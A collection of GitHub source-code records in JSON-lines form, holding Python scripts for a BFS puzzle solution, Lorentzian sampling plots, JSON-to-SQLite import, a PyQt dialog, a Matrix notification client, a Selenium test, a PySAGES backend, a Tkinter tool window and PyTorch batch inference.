gx:\n            return cost\n\n        for dy, dx in zip(mvy, mvx):\n            y_new, x_new = y + dy, x + dx\n            # Conditions for excluding a cell from the search\n            if not (-1 < y_new < H) or not (-1 < x_new < W):\n                continue\n            if visited[y_new][x_new]:\n                continue\n\n            if MAP[y_new][x_new] == 'X':\n                continue\n\n            # Add the cell to the search\n            que.append((y_new, x_new, cost + 1))\n            visited[y_new][x_new] = True\n\n    print('something wrong')\n\n\nans = 0\nfor i in range(N):\n    # print(i)\n    ans += bfs(n_yx[i], n_yx[i+1], i)\n    # print(ans)\nprint(ans)\n\n'''\n.X...X.S.X\n6..5X..X1X\n...XXXX..X\nX..9X...X.\n8.X2X..X3X\n...XX.X4..\nXX....7X..\nX..X..XX..\nX...X.XX..\n..X.......\n'''\n","repo_name":"masakiaota/kyoupuro","sub_path":"practice/novice/JOI2010_E.py","file_name":"JOI2010_E.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
{"seq_id":"31581727453","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n#Number of bins\\\r\nN=1000\r\n#Number of random numbers\\\r\nn=10000\r\n\r\n\r\ndef g(u1,N,n):\r\n    x1=(np.random.rand(n))\r\n    for i in range(len(x1)):\r\n        x1[i]=0.01+(0.99-0.01)*x1[i]\r\n    \r\n    #Function for generation\\\r\n\r\n    def f(u,x):\r\n        return u*np.tan(np.pi*(x-0.5))\r\n\r\n    #Function for verification\\\r\n    def V(u,x):\r\n        return u/((u**2+x**2)*np.pi)\r\n\r\n    #Code for sorting into bins\\\r\n    a = np.sort(f(u1,x1))\r\n\r\n    b=(a+np.abs(np.amin(a)))/(np.amax(a)-np.amin(a))\r\n    '''print a\r\n    
print b\r\n print np.amin(a),np.amax(a)-np.amin(a)'''\r\n\r\n da=(np.amax(a)-np.amin(a))/N\r\n y=(b*N)\r\n y=y.astype(int)\r\n c=[]\r\n z=list(y)\r\n for i in range(N):\r\n z1=z.count(i)\r\n c.append(z1)\r\n \r\n \r\n w1=np.linspace(np.min(a),np.max(a),len(a))\r\n g=np.asarray(c)\r\n\r\n #Code for normaliztion\\\r\n g1=np.sum(g*da)\r\n w=np.arange(np.min(a),np.max(a),da)\r\n w=w[:len(g)]\r\n return w,g/g1,V(u1,w),a\r\n\r\n #print g1 \r\n #plt.plot(w,g/g1)\r\n #plt.hist(a,N)\r\n #plt.show()\r\n #v=np.sum(g/g1)*da\r\n #print v\r\n\r\n\r\n#Values of gamma\r\n\r\nu2=[2,3,6]\r\n#si2=[1,1,16]\r\n\r\n#Plots\r\nplt.figure(1)\r\nfor i in range(len(u2)):\r\n a1,b1,c1,d=g(u2[i],N,n)\r\n plt.subplot(2,2,i+1)\r\n \r\n plt.plot(a1,b1,label='Generated Lorentzian')\r\n plt.plot(a1,c1,label='Formulated Lorentzian')\r\n #plt.hist(d,1000)\r\n plt.legend()\r\n plt.title('Gamma = '+str(u2[i]))\r\n plt.xlabel('X')\r\n \r\n plt.ylabel('P(X)')\r\n \r\nplt.show()\r\n","repo_name":"pranavgc/Numerical_Physics","sub_path":"WS03_box_muller/p3.py","file_name":"p3.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5539143529","text":"# -*- coding: utf-8 -*-\n\nimport sqlite3\nimport os\nimport json\n\n\ndef mkcmd(tabele_name, data, autoid=False):\n\ttry:data=data[0]\n\texcept:raise(Exception(\"input data as list. \\nactual: %s\"%(type(data))))\n\n\tcmd=[]\n\tif autoid:\n\t\tcmd.append(\"id integer primary key autoincrement\")\n\tfor key,value in data.items():\n\t\tcmd_one = str(key)\n\t\tif type(value)==type(0):\n\t\t\tcmd_one+= \" int\"\n\t\tif type(value)==type(0.):\n\t\t\tcmd_one+= \" float\"\n\t\tif type(value)==type(u\"\"):\n\t\t\tcmd_one+= \" text\"\n\t\tif type(value)==type([]):\n\t\t\tcmd_one+= \" sqlist\"\n\n\t\tcmd.append(cmd_one)\n\t\tresistration_cmd=\"create table if not exists %s (\"%tabele_name + \", \".join(cmd) + \")\"\n\t\tinsert_cmd = \"insert into\" + \" %s \"%tabele_name + \"(%s)\"%\", \".join(data.keys()) + \" values \" + \"(%s)\"%\",\".join([\"?\"]*len(data))\n\t\tsort_index=data.keys()\n\treturn resistration_cmd,insert_cmd,sort_index\n\ndef register_data(tabele_name, database_name, data, autoid=True):\n\tsqlite3.register_adapter(list, lambda l: ';'.join([str(i) for i in l]))\n\tsqlite3.register_converter(\"sqlist\", lambda s: [(i) for i in s.split(';')])\n\tcon = sqlite3.connect(database_name,detect_types = sqlite3.PARSE_DECLTYPES)\n\tcon.row_factory = sqlite3.Row\n\n\tcreate_table, insert_sql, sort= mkcmd(tabele_name, data, autoid)\n\tcon.execute(create_table)\n\tcontent = [j_one.values() for j_one in data]\n\tcon.executemany(insert_sql,content)\n\tcon.commit()\n\ndef load_data(tabele_name, database_name):\n\tcon = sqlite3.connect(database_name,detect_types = sqlite3.PARSE_DECLTYPES)\n\tcon.row_factory = sqlite3.Row\n\tcur = con.cursor()\n\tselect_sql = 'select * from %s'%tabele_name\n\tcur.execute(select_sql)\n\treturn cur.fetchall()\n\nif __name__ == \"__main__\":\n\tdbname = 'database.db'\n\tos.remove(dbname)\n\tj=json.load(open(\"title.json\"))\n\tregister_data(\"titles\", dbname, j, autoid=False)\n\t# print len(load_data(\"titles\", dbname))\n\n\n","repo_name":"sammrai/VideoListViwer","sub_path":"json2sqldata/json2sql.py","file_name":"json2sql.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41958001738","text":"from PyQt5.QtCore import QStringListModel, pyqtSignal\r\nfrom 
Front.ui_SelectVar import Ui_Dialog\r\nfrom PyQt5 import QtWidgets\r\n\r\n\r\nclass SelectVar(QtWidgets.QDialog, Ui_Dialog):\r\n \"\"\"Menu used to select the features and target of a data\"\"\"\r\n trigger = pyqtSignal(object)\r\n\r\n def __init__(self, *args, **kwargs):\r\n super(SelectVar, self).__init__(*args, **kwargs)\r\n # Initializing from ui.file (designer)\r\n self.setupUi(self)\r\n # Initializing the Features and Target Columns\r\n self.Target.setModel(QStringListModel())\r\n self.Features.setModel(QStringListModel())\r\n # When button are clicked\r\n self.feature_push.clicked.connect(self.add_feature)\r\n self.target_push.clicked.connect(self.add_target)\r\n self.feature_cancel.clicked.connect(self.cancel_feature)\r\n self.target_cancel.clicked.connect(self.cancel_target)\r\n # When the Users clicked on the button \"Ok\"\r\n self.buttonBox.accepted.connect(self.accept_value)\r\n\r\n def add_target(self):\r\n \"\"\"Clean Target List,Add a column name from Variables List to Target List \"\"\"\r\n self.Target.setModel(QStringListModel())\r\n cu_data = self.Variables.currentIndex().data()\r\n list_va = self.Target.model().stringList()\r\n list_va.append(cu_data)\r\n self.Target.model().setStringList((list(set(list_va))))\r\n\r\n def add_feature(self):\r\n \"\"\"Add a column name from Variables List to Features List \"\"\"\r\n cu_data = self.Variables.currentIndex().data()\r\n list_va = self.Features.model().stringList()\r\n list_va.append(cu_data)\r\n self.Features.model().setStringList((list(set(list_va))))\r\n\r\n def cancel_feature(self):\r\n \"\"\" Remove Feature from Features List \"\"\"\r\n cu_data = self.Variables.currentIndex().data()\r\n list_va = self.Features.model().stringList()\r\n list_va = [x for x in list_va if x != cu_data]\r\n self.Features.model().setStringList((list(set(list_va))))\r\n\r\n def cancel_target(self):\r\n \"\"\" Remove Target from Target List \"\"\"\r\n cu_data = self.Target.currentIndex().data()\r\n list_va = self.Target.model().stringList()\r\n list_va = [x for x in list_va if x != cu_data]\r\n self.Target.model().setStringList((list(set(list_va))))\r\n\r\n def accept_value(self):\r\n \"\"\"When the user clicked pn \"Ok\" => send the information\r\n from target and features as Signal\"\"\"\r\n tar_name = self.Target.model().stringList()\r\n fea_name = self.Features.model().stringList()\r\n self.Target.setModel(QStringListModel())\r\n self.Features.setModel(QStringListModel())\r\n self.close()\r\n self.trigger.emit([tar_name, fea_name])\r\n","repo_name":"baptlano24/PyTanagra","sub_path":"Front/SelectVar.py","file_name":"SelectVar.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1976781742","text":"import json\nimport os\nimport sys\nimport asyncio\nfrom nio import AsyncClientConfig, MatrixRoom, RoomMessageText, AsyncClient, LoginResponse\n\nfrom eliot import log_call, start_action, Message\nimport markdown\nfrom nio.event_builders.state_events import EnableEncryptionBuilder\nfrom nio.responses import RoomCreateResponse\n\nimport ekklesia_notify.settings\n\nsettings = ekklesia_notify.settings.settings.transport_settings.matrix\n\n\ndef make_client():\n client_config = AsyncClientConfig(encryption_enabled=True)\n return AsyncClient(\n settings.homeserver,\n settings.mxid,\n device_id=settings.device_id,\n config=client_config,\n store_path=settings.store_dir\n )\n\n\n@log_call\ndef write_details_to_disk(resp: LoginResponse) -> None:\n 
\"\"\"Writes login details to disk so that we can restore our session later\n without logging in again and creating a new device ID.\n Arguments:\n resp {LoginResponse} -- the successful client login response.\n \"\"\"\n with open(settings.session_details_file, \"w\") as f:\n json.dump({\"access_token\": resp.access_token, \"device_id\": resp.device_id, \"user_id\": resp.user_id}, f)\n\n\n@log_call\nasync def login(cl) -> None:\n \"\"\"Log in either using the global variables or (if possible) using the\n session details file.\n \"\"\"\n # Restore the previous session if we can\n # See the \"restore_login.py\" example if you're not sure how this works\n session_details_file = settings.session_details_file\n\n if os.path.exists(session_details_file) and os.path.isfile(session_details_file):\n try:\n with open(session_details_file, \"r\") as f:\n config = json.load(f)\n cl.access_token = config['access_token']\n cl.user_id = config['user_id']\n cl.device_id = config['device_id']\n\n # This loads our verified/blacklisted devices and our keys\n cl.load_store()\n print(f\"Logged in using stored credentials: {cl.user_id} on {cl.device_id}\")\n\n except IOError as err:\n print(f\"Couldn't load session from file. Logging in. Error: {err}\")\n except json.JSONDecodeError:\n print(\"Couldn't read JSON file; overwriting\")\n\n # We didn't restore a previous session, so we'll log in with a password\n if not cl.user_id or not cl.access_token or not cl.device_id:\n # this calls the login method defined in AsyncClient from nio\n resp = await cl.login(settings.password.get_secret_value())\n\n if isinstance(resp, LoginResponse):\n print(\"Logged in using a password; saving details to disk\")\n write_details_to_disk(resp)\n else:\n print(f\"Failed to log in: {resp}\")\n sys.exit(1)\n\n\nasync def after_first_sync(cl: AsyncClient):\n with start_action(action_type=\"after_first_sync\") as action:\n await cl.synced.wait()\n resp = await cl.joined_rooms()\n action.add_success_fields(joined_rooms=resp.rooms, cl_rooms=cl.rooms)\n\n\nasync def message_callback(room: MatrixRoom, event: RoomMessageText) -> None:\n print(f\"Message received in room {room.display_name}\\n\" f\"{room.user_name(event.sender)} | {event.body}\")\n\n\nasync def send(cl: AsyncClient, room_id: str, body: str):\n formatted_body = markdown.markdown(body)\n\n with start_action(action_type=\"send\", room_id=room_id, cl_rooms=cl.rooms) as action:\n resp = await cl.room_send(\n room_id=room_id,\n message_type=\"m.room.message\",\n ignore_unverified_devices=True,\n content={\n \"msgtype\": \"m.text\",\n \"body\": body,\n \"format\": \"org.matrix.custom.html\",\n \"formatted_body\": formatted_body\n }\n )\n action.add_success_fields(response=resp)\n\n\n@log_call\ndef find_room_id(cl, mxid):\n for room_id, room in cl.rooms.items():\n if mxid in room.users:\n return room_id\n\n\n@log_call\nasync def get_or_create_direct_room(cl: AsyncClient, mxid: str) -> str:\n\n room_id = find_room_id(cl, mxid)\n\n if room_id:\n Message.log(msg=\"using existing room\", room=room_id)\n return room_id\n\n with start_action(action_type=\"create_direct_room\", recipient=mxid) as action:\n resp = await cl.room_create(\n name=\"Benachrichtigungen\",\n topic=\"Hier gibts Benachrichtigungen\",\n federate=False,\n invite=[mxid],\n initial_state=[EnableEncryptionBuilder().as_dict()]\n )\n if isinstance(resp, RoomCreateResponse):\n action.add_success_fields(response=resp)\n else:\n raise Exception(\"failed to create room\")\n\n room_id = resp.room_id\n\n with 
start_action(action_type=\"join_room\", room=room_id):\n        await cl.join(room_id)\n\n    return room_id\n\n\nasync def message_to_recipient(body: str, recipient: str):\n    cl = make_client()\n    await login(cl)\n    asyncio.create_task(cl.sync_forever(timeout=30000, full_state=True))\n    await after_first_sync(cl)\n    room_id = await get_or_create_direct_room(cl, recipient)\n    await send(cl, room_id, body)\n","repo_name":"edemocracy/ekklesia-notify","sub_path":"src/ekklesia_notify/lib/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":5160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
{"seq_id":"19801442","text":"import unittest\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\nfrom selenium.webdriver.common.keys import Keys\n\n\nclass NewVisitorTest(unittest.TestCase): #➊\n    def setUp(self): #➋\n        self.binary = FirefoxBinary(\"C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe\")\n        self.browser = webdriver.Firefox(firefox_binary=self.binary)\n        self.browser.implicitly_wait(9)\n\n    def tearDown(self): #➌\n        self.browser.quit()\n\n    def check_for_row_in_list_table(self, row_text):\n        table = self.browser.find_element_by_id('id_list_table')\n        rows = table.find_elements_by_tag_name('tr')\n        self.assertIn(row_text, [row.text for row in rows])\n\n    def test_can_start_a_list_and_retrieve_it_later(self): #➍\n        # Edith has heard about a cool new online to-do app\n        # She goes to check out its homepage\n        self.browser.get('http://localhost:8000')\n\n        # She notices that both the page title and the header contain the word \"To-Do\"\n        self.assertIn('To-Do', self.browser.title) #➎\n        header_text = self.browser.find_element_by_tag_name('h1').text\n        self.assertIn('To-Do', header_text)\n\n        # The app invites her to enter a to-do item\n        inputbox = self.browser.find_element_by_id('id_new_item')\n        self.assertEqual(inputbox.get_attribute('placeholder'),\n            'Enter a to-do item'\n        )\n\n        # She types \"Buy peacock feathers\" into a text box\n        # Edith's hobby is tying fly-fishing lures\n        inputbox.send_keys('Buy peacock feathers')\n\n        # When she hits enter, the page updates\n        inputbox.send_keys(Keys.ENTER)\n        \n        # The to-do list table now shows \"1: Buy peacock feathers\"\n        self.check_for_row_in_list_table('1: Buy peacock feathers')\n\n\n        # There is still a text box on the page, inviting her to add another item\n        # She enters \"Use peacock feathers to make a fly\"\n        inputbox = self.browser.find_element_by_id('id_new_item')\n        inputbox.send_keys('Use peacock feathers to make a fly')\n        inputbox.send_keys(Keys.ENTER)\n        # Edith is very methodical\n\n        # The page updates again, and now her list shows both to-do items\n        self.check_for_row_in_list_table('1: Buy peacock feathers')\n        self.check_for_row_in_list_table('2: Use peacock feathers to make a fly')\n        \n        self.fail('Finish the test!')\n        \n        # Edith wonders whether the site will remember her list\n\n        # She sees that the site has generated a unique URL for her\n        # and there is some explanatory text about this feature\n\n        # She visits that URL, and her to-do list is still there\n\n        # Satisfied, she goes to sleep\n\n\nif __name__ == '__main__': #➐\n    unittest.main(warnings='ignore') #➑\n","repo_name":"TarriMorko/django_tdd","sub_path":"superlists/functional_test.py","file_name":"functional_test.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"4441639576","text":"# SPDX-License-Identifier: MIT\n# See LICENSE.md and CONTRIBUTORS.md at https://github.com/SSAGESLabs/PySAGES\n\nfrom importlib import import_module\n\nfrom pysages.typing import Any, Callable, JaxArray, NamedTuple, Optional\n\nJaxMDState = Any\n\n\nclass JaxMDContextState(NamedTuple):\n    \"\"\"\n    Provides an interface for the data structure returned by `JaxMDContext.init_fn` and\n    expected as the single argument of `JaxMDContext.step_fn`.\n\n    Arguments\n    ---------\n    state: JaxMDState\n        Holds the particle information and corresponds to the internal state of\n        `jax_md.simulate` methods.\n\n    extras: Optional[dict]\n        Additional arguments required by `JaxMDContext.step_fn`, these might include for\n        instance, the neighbor list or the time step.\n    \"\"\"\n\n    state: JaxMDState\n    extras: Optional[dict]\n\n\nclass JaxMDContext(NamedTuple):\n    \"\"\"\n    Provides an interface for the data structure expected from `generate_context` for\n    `jax_md`-backed simulations.\n\n    Arguments\n    ---------\n    init_fn: Callable[..., JaxMDContextState]\n        Initializes the `jax_md` state. Generally, this will be the `init_fn` of any\n        of the simulation routines in `jax_md` (or wrappers around these).\n\n    step_fn: Callable[..., JaxMDContextState]\n        Takes a state and advances a `jax_md` simulation by one step. Generally, this\n        will be the `apply_fn` of any of the simulation routines in `jax_md` (or wrappers\n        around these).\n\n    box: JaxArray\n        Affine transformation from a unit hypercube to the simulation box.\n\n    dt: float\n        Step size of the simulation.\n    \"\"\"\n\n    init_fn: Callable[..., JaxMDContextState]\n    step_fn: Callable[..., JaxMDContextState]\n    box: JaxArray\n    dt: float\n\n\nclass SamplingContext:\n    \"\"\"\n    PySAGES simulation context. Manages access to the backend-dependent simulation context.\n    \"\"\"\n\n    def __init__(\n        self,\n        sampling_method,\n        context_generator: Callable,\n        callback: Optional[Callable] = None,\n        context_args: dict = {},\n        **kwargs,\n    ):\n        \"\"\"\n        Automatically identifies the backend and binds the sampling method to\n        the simulation context.\n        \"\"\"\n        self._backend_name = None\n        context = context_generator(**context_args)\n        module_name = type(context).__module__\n\n        if module_name.startswith(\"ase.md\"):\n            self._backend_name = \"ase\"\n        elif module_name.startswith(\"hoomd\"):\n            self._backend_name = \"hoomd\"\n        elif isinstance(context, JaxMDContext):\n            self._backend_name = \"jax-md\"\n        elif module_name.startswith(\"lammps\"):\n            self._backend_name = \"lammps\"\n        elif module_name.startswith(\"simtk.openmm\") or module_name.startswith(\"openmm\"):\n            self._backend_name = \"openmm\"\n\n        if self._backend_name is None:\n            backends = \", \".join(supported_backends())\n            raise ValueError(f\"Invalid backend {module_name}: supported options are ({backends})\")\n\n        self.context = context\n        self.method = sampling_method\n        self.view = None\n        self.run = None\n\n        backend = import_module(\".\" + self._backend_name, package=\"pysages.backends\")\n        self.sampler = backend.bind(self, callback, **kwargs)\n\n        # `self.view` and `self.run` *must* be set by the backend bind function.\n        assert self.view is not None\n        assert self.run is not None\n\n    @property\n    def backend_name(self):\n        return self._backend_name\n\n    def __enter__(self):\n        \"\"\"\n        Trampoline 'with statements' to the wrapped context when the backend supports it.\n        \"\"\"\n        if hasattr(self.context, \"__enter__\"):\n            return self.context.__enter__()\n        return self.context\n\n    def __exit__(self, exc_type, exc_value, exc_traceback):\n        \"\"\"\n        Trampoline 'with statements' to the wrapped context when the backend supports it.\n        \"\"\"\n        if hasattr(self.context, \"__exit__\"):\n            self.context.__exit__(exc_type, exc_value, exc_traceback)\n\n\ndef supported_backends():\n    return (\"ase\", \"hoomd\", \"jax-md\", \"lammps\", \"openmm\")\n","repo_name":"SSAGESLabs/PySAGES","sub_path":"pysages/backends/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"18"}
{"seq_id":"41027436589","text":"import datetime\nimport os\nfrom tkinter.font import BOLD\n\nfrom tkinter.scrolledtext import ScrolledText\nfrom tkinter import (\n    ttk, Frame, BOTH, NW, YES, HORIZONTAL, SE, TOP, NORMAL, END, DISABLED)\n\nfrom conf.configuration import (\n    DETERMINATE, INFO, WARN, ERROR, BLACK, GOLDENROD, RED,\n    INDETERMINATE, LINUX_OS, WM_DELETE_WINDOW,\n    VALUE, SELECT_USE_CONF_LABEL,\n    NOT_SELECTED_ANACONDA_MSG, CREATE_ENV_MSG,\n    CANCEL_MSG, ANACONDA_DIR, TOOL_NAME, DATA_SCRIPT_LABEL, MODEL_SCRIPT_LABEL,\n    TEST_FUNC_LABEL, CONSOLE_FONT_NAME)\n\nfrom src.com.common import (\n    cmd_exec_run_posix, show_wizard, get_geometry, create_env,\n    create_test_exec_script, save_config, stop_cmd)\nfrom src.gui.main_menu import MainMenu\nfrom src.gui.test_select_frame import TestSelectFrame\nfrom src.gui.wizard.conf_select_wizard import ConfSelectWizard\nfrom src.info.env_setup_info import EnvSetupInfo\n\n\nclass MainWindow(Frame):\n\n    def __init__(self, root=None, width=0.6, height=0.75, size=10,\n                 use_factor=True):\n        self.__root = root\n        Frame.__init__(self, self.__root)\n        # MainWindow size\n        w, h, x, y = get_geometry(self, width, height, use_factor)\n\n        self.__root.geometry('%dx%d+%d+%d' % (w, h, x, y))\n        self.__root.minsize(int(w), int(h))\n        self.lift()\n\n        self.__test_select_frame = TestSelectFrame(self)\n        self.__test_select_frame.pack(fill=BOTH, anchor=NW, expand=YES,\n                                      padx=5, pady=5)\n\n        # console\n        self.__console = ScrolledText(self, font=(CONSOLE_FONT_NAME, size),\n                                      height=1)\n        self.__console.configure(state=DISABLED)\n        self.__console.pack(fill=BOTH, anchor=NW, expand=YES, padx=5, pady=5)\n\n        # Progressbar\n        self.__pg_bar = ttk.Progressbar(self, orient=HORIZONTAL,\n                                        mode=DETERMINATE)\n        self.__pg_bar.configure(maximum=100, value=0)\n        self.__pg_bar.pack(anchor=SE, padx=5, pady=5)\n\n        self.__root.title(TOOL_NAME)\n\n        self.pack(side=TOP, fill=BOTH, expand=YES)\n\n        self.__main_menu = MainMenu(self.__root)\n        self.__root.configure(menu=self.__main_menu)\n\n        # Console output color\n        self.__console.tag_configure(INFO, foreground=BLACK,\n                                     font=(CONSOLE_FONT_NAME, size))\n        self.__console.tag_configure(WARN, foreground=GOLDENROD,\n                                     font=(CONSOLE_FONT_NAME, size))\n        self.__console.tag_configure(ERROR, foreground=RED,\n                                     font=(CONSOLE_FONT_NAME, size, BOLD))\n\n        self.is_running = False\n        self.__root.protocol(WM_DELETE_WINDOW, self.__close)\n\n        self.__user = TOOL_NAME\n\n    def __close(self):\n        if not self.is_running:\n            self.pg_bar_stop()\n            self.__root.destroy()\n\n    def c_println(self, str_val='', mode='normal'):\n        self.__console.configure(state=NORMAL)\n\n        split_val = str_val.splitlines()\n        for index, value in enumerate(split_val):\n            # When it exceeds the maximum line,\n            # it deletes it from the first line\n            if len(self.__console.get('1.0', END).splitlines()) > 1024 * 4:\n                # Delete First Line\n                self.__console.delete('1.0', '1.end')\n                # Delete Line Feed\n                self.__console.delete('1.0')\n\n            # Insert New Line\n            if index == 0:\n                if mode == 'normal':\n                    self.__console.insert(\n                        END, '%s : [%s]' % (datetime.datetime.now(),\n                                            self.__user), mode)\n\n                else:\n                    self.__console.insert(\n                        END,\n                        '%s : [%s] [%s] ' % (datetime.datetime.now(),\n                                             self.__user, mode.upper()), mode)\n\n            self.__console.insert(END, '%s%s' % (value, os.linesep), mode)\n\n        
self.__console.see(END)\n self.update()\n\n self.__console.configure(state=DISABLED)\n\n @property\n def test_select_frame(self):\n return self.__test_select_frame\n\n @test_select_frame.deleter\n def test_select_frame(self):\n del self.__test_select_frame\n\n @property\n def console(self):\n return self.__console\n\n @console.deleter\n def console(self):\n del self.__console\n\n @property\n def pg_bar(self):\n return self.__pg_bar\n\n @pg_bar.deleter\n def pg_bar(self):\n del self.__pg_bar\n\n def pg_bar_start(self):\n self.__pg_bar.configure(mode=INDETERMINATE)\n self.__pg_bar.start(20)\n\n def pg_bar_stop(self):\n self.__pg_bar.stop()\n self.__pg_bar.configure(mode=DETERMINATE)\n self.__pg_bar[VALUE] = 0\n\n def test_func_run(self):\n # Check anaconda\n if ANACONDA_DIR is None:\n self.c_println(NOT_SELECTED_ANACONDA_MSG, ERROR)\n return\n\n select_test_func_list = self.__test_select_frame.get_select_test_func()\n select_model_list = self.__test_select_frame.get_select_model()\n select_data_list = self.__test_select_frame.get_select_data()\n\n if len(select_test_func_list) > 0 and len(select_model_list) > 0:\n # Treeview selectmode is BROWSE\n test_func = select_test_func_list[0]\n self.c_println('%s : %s' % (TEST_FUNC_LABEL, test_func.abs_path),\n mode=INFO)\n\n if select_data_list:\n data_script = select_data_list[0]\n self.c_println('%s : %s' % (DATA_SCRIPT_LABEL,\n data_script.abs_path), mode=INFO)\n else:\n data_script = None\n\n model_script = select_model_list[0]\n self.c_println('%s : %s' % (MODEL_SCRIPT_LABEL,\n model_script.abs_path), mode=INFO)\n\n # select confing\n conf_select_wizard = ConfSelectWizard(\n master=self.master, conf_path=test_func.conf_path)\n\n show_wizard(title=SELECT_USE_CONF_LABEL, wizard=conf_select_wizard)\n if not conf_select_wizard.is_run:\n self.c_println(CANCEL_MSG, mode=INFO)\n return\n\n test_func.conf_path = conf_select_wizard.conf_path\n\n # Save config\n save_config()\n\n if test_func.conf_path:\n self.c_println('Configuration : %s' % test_func.conf_path,\n mode=INFO)\n else:\n self.c_println('Not used configuration file', mode=INFO)\n\n # Create Execute Environment\n env_setup = EnvSetupInfo.get_data(test_func.env_id)\n\n env_python_dir = self.__create_env(script_path=env_setup.abs_path)\n\n if not env_python_dir:\n self.c_println(CANCEL_MSG, mode=INFO)\n return\n\n self.c_println('Execute Env : %s' % env_python_dir,\n mode=INFO)\n\n # template python file replace keyword\n # Created file is deleted after execution\n exec_path = create_test_exec_script(\n test_func=test_func,\n data=data_script,\n model=model_script,\n print_func=self.c_println)\n\n if exec_path:\n # Run Test Execute Function\n try:\n self.__call_test_func(\n test_func=test_func,\n env_python_dir=env_python_dir,\n test_func_script_path=exec_path)\n\n finally:\n os.remove(exec_path)\n\n def __create_env(self, script_path):\n # Format of Setup script(sh or bat)\n # Search env name after execute setup script\n # (search 'conda create or python venv')\n # return env directory\n # (AnacondaDir/envs/env_name/bin or AnacondaDir/envs/env_name)\n self.c_println(CREATE_ENV_MSG, mode=INFO)\n self.pg_bar_start()\n\n # Search Env Name\n try:\n ret_dir = create_env(script_path, self)\n\n except Exception as e:\n self.c_println(os.linesep + str(e), ERROR)\n return None\n\n finally:\n self.pg_bar_stop()\n\n return ret_dir\n\n def __call_test_func(self, test_func, env_python_dir,\n test_func_script_path):\n\n self.c_println('Test Function Start ( %s )' % test_func.abs_path,\n mode=INFO)\n 
self.pg_bar_start()\n\n # Execute environment Python and Script\n cmd = [os.path.join(env_python_dir, 'python'),\n '-u',\n test_func_script_path]\n\n ret = False\n try:\n # Execute Script\n self.__user = 'Test ID %d' % test_func.id\n if os.name == LINUX_OS:\n ret = cmd_exec_run_posix(command=cmd, main_window=self,\n cwd=test_func.dir_path)\n else:\n ret = False\n\n except Exception as e:\n self.c_println(os.linesep + str(e), ERROR)\n\n finally:\n self.__user = TOOL_NAME\n self.pg_bar_stop()\n\n if ret:\n self.c_println('Test Function Complete', mode=INFO)\n else:\n self.c_println('Test Function Failed', mode=INFO)\n\n return ret\n\n def stop_test_func(self):\n if stop_cmd():\n self.c_println('Stop!!', WARN)\n","repo_name":"tshoang/deep_saucer","sub_path":"deep_saucer_core/src/gui/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":9594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13380517649","text":"import os\nimport time\nimport sys\nimport traceback\n\nimport cv2\nimport torch\nimport torch.nn as nn\nimport timm\n\nimport numpy as np\n\nfrom models.build_model import build_model\nfrom data.datasets import build_test_loader\nfrom collections import OrderedDict\n\n\ndef main(args):\n \n print(\"Creating data loaders\")\n test_dataloader = build_test_loader(args.test_path, args.input_size, args.batch_size, args.num_workers)\n \n classes = torch.load(args.checkpoint)['classes']\n #print(classes)\n\n if args.hub == 'tv':\n model = build_model(args.net, pretrained=False, fine_tune=False, num_classes=len(classes))\n elif args.hub == 'timm':\n model = timm.create_model(args.net, pretrained=False, num_classes=len(classes))\n else:\n raise NameError('Model hub only support tv or timm')\n # support multi gpu\n model = nn.DataParallel(model)#, device_ids=args.device)\n model.load_state_dict(torch.load(args.checkpoint)['model_state_dict'])\n model.cuda()\n\n model.eval()\n\n epoch_data_len = len(test_dataloader.dataset)\n batch_num = len(test_dataloader)\n\n bg_time = time.time()\n with torch.no_grad():\n for images, img_path in test_dataloader:\n try:\n input = images.cuda()\n output = model(input) #[batch_size, len(classes)]\n\n indexes = output.detach().cpu().numpy().argmax(1)\n for i, index in enumerate(indexes):\n print('{}\\t{}\\t{}'.format(img_path[i], classes[index], index))\n sys.stdout.flush()\n\n except:\n #print(image)\n traceback.print_exc()\n\n total_time = time.time() - bg_time\n print('Total used time:{}, Avg used time:{}'.format(total_time, {total_time/epoch_data_len*batch_num}))\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(description='PyTorch Classification Batch Inference')\n\n parser.add_argument('--test-path', default='./data/beauty', help='dataset')\n parser.add_argument('--hub', default='tv', help='model hub, from torchvision(tv) or timm')\n parser.add_argument('--net', default='resnet50', help='model name')\n parser.add_argument('--device', default=[0], help='device')\n parser.add_argument('-b', '--batch-size', default=32, type=int)\n parser.add_argument('-j', '--num-workers', default=8, type=int, metavar='N',\n help='number of data loading workers (default: 8)')\n parser.add_argument('--checkpoint', default='./checkpoints/model_2_600.pth', help='checkpoint')\n parser.add_argument('--input-size', default=224, type=int, help='size of input')\n\n args = parser.parse_args()\n\n print(args)\n 
